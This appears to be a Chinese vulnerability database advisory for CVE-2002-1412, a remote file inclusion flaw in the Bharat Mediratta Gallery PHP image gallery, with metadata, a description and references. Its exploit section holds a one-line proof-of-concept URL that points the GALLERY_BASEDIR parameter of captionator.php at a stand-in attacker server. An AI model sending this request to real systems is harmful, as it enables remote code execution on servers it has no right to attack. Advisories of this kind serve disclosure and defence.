Bharat Mediratta Gallery远程文件可包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106897 漏洞类型 输入验证
发布时间 2002-08-01 更新时间 2006-08-17
CVE编号 CVE-2002-1412 CNNVD-ID CNNVD-200304-100
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21676
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200304-100
|漏洞详情
BharatMedirattaGallery是一款基于WEB的图象库系统。BharatMedirattaGallery中的captionator.php脚本对用户提交的参数缺少正确检查,远程攻击者可以利用这个漏洞包含远程服务器上的代码并执行代码。MedirattaGallery中的captionator.php脚本对变量的值缺少正确检查,问题代码如下:errors/configmode.php[...][...]攻击者可以提供远程主机上的任意文件作为'GALLERY_BASEDIR'参数的值向captionator.php脚提交请求,在PHP配置中'allow_url_fopen'和'register_globals'选项开启的情况下,可导致包含文件中的代码以MedirattaGallery进程权限在系统中执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/5375/info

Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter. 

http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
|参考资料

来源:DEBIAN
名称:DSA-138
链接:http://www.debian.org/security/2002/dsa-138
来源:BUGTRAQ
名称:20020801codeinjectioningallery
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0471.html
来源:gallery.menalto.com
链接:http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=50&mode=thread&order=0&thold=0
来源:XF
名称:gallery-basedir-execute-commands(9737)
链接:http://xforce.iss.net/xforce/xfdb/9737
来源:BID
名称:5375
链接:http://www.securityfocus.com/bid/5375